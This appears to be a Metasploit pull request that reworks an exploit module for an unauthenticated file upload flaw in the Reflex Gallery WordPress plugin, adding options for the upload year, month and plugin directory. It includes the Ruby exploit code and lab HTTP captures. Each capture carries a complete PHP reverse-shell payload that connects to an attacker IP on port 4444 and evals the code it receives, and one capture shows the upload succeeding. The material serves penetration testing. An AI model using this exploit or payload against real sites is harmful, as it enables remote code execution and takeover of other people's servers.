### PR TITLE
Remove current date constraint from uploaded path in `wp_reflexgallery_file_upload`

### DIFF
--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -42,6 +42,14 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
     )
+
+    time = Time.new
+    register_options(
+      [
+        OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
+        OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]),
+      ]
+    )
   end
 
   def check
@@ -55,9 +63,16 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
     post_data = data.to_s
 
+    year = datastore['upload_year']
+    month = datastore['upload_month']
+
     res = send_request_cgi({
       'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
       'method' => 'POST',
+      'vars_get' => {
+        'Year' => "#{year}",
+        'Month' => "#{month}"
+      },
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => post_data
     })
@@ -66,6 +81,8 @@ class MetasploitModule < Msf::Exploit::Remote
       if res.code == 200 && res.body =~ /success|#{php_pagename}/
         print_good("Our payload is at: #{php_pagename}. Calling payload...")
         register_files_for_cleanup(php_pagename)
+      elsif res.code == 200 && res.body.include?("does not exist")
+        fail_with(Failure::Unknown, "#{peer} - Upload directory /#{year}/#{month} does not exist. Try setting them to an existing upload folder or emptying the variables to upload to the root upload folder")
       else
         fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
       end
@@ -75,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Calling payload...")
     send_request_cgi(
-      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
+      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, php_pagename)
     )
   end
 end

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -48,8 +48,17 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
         OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]),
+        OptString.new('PLUGIN_DIRECTORY_NAME', [ true, 'Name of the directory that contains the reflex-gallery plugin', 'reflex-gallery']),
       ]
     )
+  end
+
+  def plugin_dir
+    datastore['PLUGIN_DIRECTORY_NAME']
+  end
+  
+  def plugin_uri
+    normalize_uri(wordpress_url_plugins, plugin_dir)
   end
 
   def check
@@ -67,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
     month = datastore['upload_month']
 
     res = send_request_cgi({
-      'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
+      'uri' => normalize_uri(plugin_uri, 'admin', 'scripts', 'FileUploader', 'php.php'),
       'method' => 'POST',
       'vars_get' => {
         'Year' => "#{year}",

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -55,17 +55,9 @@ class MetasploitModule < Msf::Exploit::Remote
     data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
     post_data = data.to_s
 
-    time = Time.new
-    year = time.year.to_s
-    month = "%02d" % time.month
-
     res = send_request_cgi({
       'uri' => normalize_uri(wordpress_url_plugins, 'reflex-gallery', 'admin', 'scripts', 'FileUploader', 'php.php'),
       'method' => 'POST',
-      'vars_get' => {
-        'Year' => "#{year}",
-        'Month' => "#{month}"
-      },
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => post_data
     })
@@ -83,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Calling payload...")
     send_request_cgi(
-      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename)
+      'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_pagename)
     )
   end
 end

--- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
+++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         OptString.new('UPLOAD_YEAR', [ false, 'Year to use in upload path', time.year.to_s]),
-        OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', "%02d" % time.month]),
+        OptString.new('UPLOAD_MONTH', [ false, 'Month to use in upload path', '%02d' % time.month]),
         OptString.new('PLUGIN_DIRECTORY_NAME', [ true, 'Name of the directory that contains the reflex-gallery plugin', 'reflex-gallery']),
       ]
     )
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def plugin_dir
     datastore['PLUGIN_DIRECTORY_NAME']
   end
-  
+
   def plugin_uri
     normalize_uri(wordpress_url_plugins, plugin_dir)
   end
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    php_pagename = rand_text_alpha(8 + rand(8)) + '.php'
+    php_pagename = rand_text_alpha(rand(8..15)) + '.php'
 
     data = Rex::MIME::Message.new
     data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"qqfile\"; filename=\"#{php_pagename}\"")
@@ -79,8 +79,8 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri' => normalize_uri(plugin_uri, 'admin', 'scripts', 'FileUploader', 'php.php'),
       'method' => 'POST',
       'vars_get' => {
-        'Year' => "#{year}",
-        'Month' => "#{month}"
+        'Year' => year.to_s,
+        'Month' => month.to_s
       },
       'ctype' => "multipart/form-data; boundary=#{data.bound}",
       'data' => post_data
@@ -90,7 +90,7 @@ class MetasploitModule < Msf::Exploit::Remote
       if res.code == 200 && res.body =~ /success|#{php_pagename}/
         print_good("Our payload is at: #{php_pagename}. Calling payload...")
         register_files_for_cleanup(php_pagename)
-      elsif res.code == 200 && res.body.include?("does not exist")
+      elsif res.code == 200 && res.body.include?('does not exist')
         fail_with(Failure::Unknown, "#{peer} - Upload directory /#{year}/#{month} does not exist. Try setting them to an existing upload folder or emptying the variables to upload to the root upload folder")
       else
         fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}")
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
       fail_with(Failure::Unknown, 'Server did not respond in an expected way')
     end
 
-    print_status("Calling payload...")
+    print_status('Calling payload...')
     send_request_cgi(
       'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', year, month, php_pagename)
     )


### PR DESCRIPTION
This fixes a bug in `unix/webapp/wp_reflexgallery_file_upload` where the current year and month are forced in the request.

This causes the server to reject the exploit there is no folder in `wp-content/uploads` for the current year and month.

The original source code of the vulnerable plugin looks like this:

https://github.com/wp-plugins/reflex-gallery/blob/9d23d8c81c4f30c83d9aa5ba0cbb03f1126b071f/admin/scripts/FileUploader/php.php#L172
```php
// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = array();
// max file size in bytes
$sizeLimit = ini_get('upload_max_filesize') * 1024 * 1024;

$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);
$result = $uploader->handleUpload('../../../../../uploads/'.$_GET['Year'].'/'.$_GET['Month'].'/');
// to pass data through iframe you will need to encode all html tags
echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);
```

## Verification

- [ ] Configure a Wordpress server using a vulnerable version of the plugin (<= 3.1.3).
- [ ] Make sure no uploads are present for the current year/month.
- [ ] Try the current version, and it should fail, since the (as of time of writing), the 2025/12 folder should not exist.

This is the capture for the current version:
```http
POST /app/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2025&Month=12 HTTP/1.1
Host: 192.168.100.171
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Content-Type: multipart/form-data; boundary=---------------------------036324264670751490433286373345
Content-Length: 1361

-----------------------------036324264670751490433286373345
Content-Disposition: form-data; name="qqfile"; filename="qhPDqfxjUcScrBd.php"
Content-Type: application/octet-stream

/*<?php /**/ error_reporting(0); $ip = '192.168.2.225'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------036324264670751490433286373345--

HTTP/1.1 200 OK
Date: Wed, 03 Dec 2025 19:53:28 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 62
Content-Type: text/html; charset=UTF-8

{"error":"Directory does not exist and could not be created."}
```
- [ ] Try the patched version

The capture should look like this:
```http
POST /app/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php HTTP/1.1
Host: 192.168.100.171
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15
Content-Type: multipart/form-data; boundary=---------------------------270729496445002100805631219942
Content-Length: 1360

-----------------------------270729496445002100805631219942
Content-Disposition: form-data; name="qqfile"; filename="yCMgppBfCGdork.php"
Content-Type: application/octet-stream

/*<?php /**/ error_reporting(0); $ip = '192.168.2.225'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
-----------------------------270729496445002100805631219942--

HTTP/1.1 200 OK
Date: Wed, 03 Dec 2025 20:57:47 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 54
Content-Type: text/html; charset=UTF-8

{"success":true,"fileName":"\/\/\/yCMgppBfCGdork.php"}
```

## Notes

Since the path can be customized with a year and month that are arbitrary, it could be worthwhile to add a `PATH` option so you can choose where to upload.
